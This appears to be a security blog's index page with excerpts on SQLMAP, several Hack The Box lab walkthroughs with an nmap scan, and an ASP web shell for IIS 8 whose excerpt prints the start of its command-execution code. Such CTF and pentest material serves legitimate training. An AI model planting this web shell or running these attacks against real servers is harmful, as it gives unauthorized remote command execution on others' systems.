SQLMAP – on Windows

SQL injection allows us to remotely pull down all the tables, login usernames and admin accounts for a website. The most powerful tool for SQL injection is SQLMAP, which we can use on Windows and Kali. Test all your websites with SQLMAP to ensure that they are not vulnerable. It is simply essential that you […]

HTB – Shrek

Hello friends!! Today we are going to solve another CTF challenge, “Shrek”, which is available online for those who want to increase their skill in penetration testing and black box testing. Shrek is a retired vulnerable lab presented by Hack the Box for practicing penetration testing online according to your experience level; they have a collection of vulnerable […]

HTB – Solid State

Phase 1 – Enumeration: As always, we’ll start off with a simple nmap scan to see what’s out there. ➜ ~ nmap --open -p- -R -T4 --max-retries 3 --min-rate 120 --max-rtt-timeout 300ms -Pn 10.10.10.51 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-26 20:03 EST Nmap scan report for 10.10.10.51 Host is up (0.12s latency). Not shown: 61105 […]

HTB – Cronos

Today we are going to solve another CTF challenge, “Cronos”, which is available online for those who want to increase their skill in penetration testing. Cronos is a retired vulnerable lab presented by Hack the Box for practicing penetration testing online according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert […]

ASP Webshell For IIS 8

ASP Webshell For IIS 8 <!– ASP Webshell Working on latest IIS Referance :- https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script http://www.w3schools.com/asp/ –> <% Set oScript = Server.CreateObject(“WSCRIPT.SHELL”) Set oScriptNet = Server.CreateObject(“WSCRIPT.NETWORK”) Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”) Function getCommandOutput(theCommand) Dim objShell, objCmdExec Set objShell = CreateObject(“WScript.Shell”) Set objCmdExec = objshell.exec(thecommand) getCommandOutput = objCmdExec.StdOut.ReadAll end Function %> <HTML> <BODY> <FORM action=”” method=”GET”> […]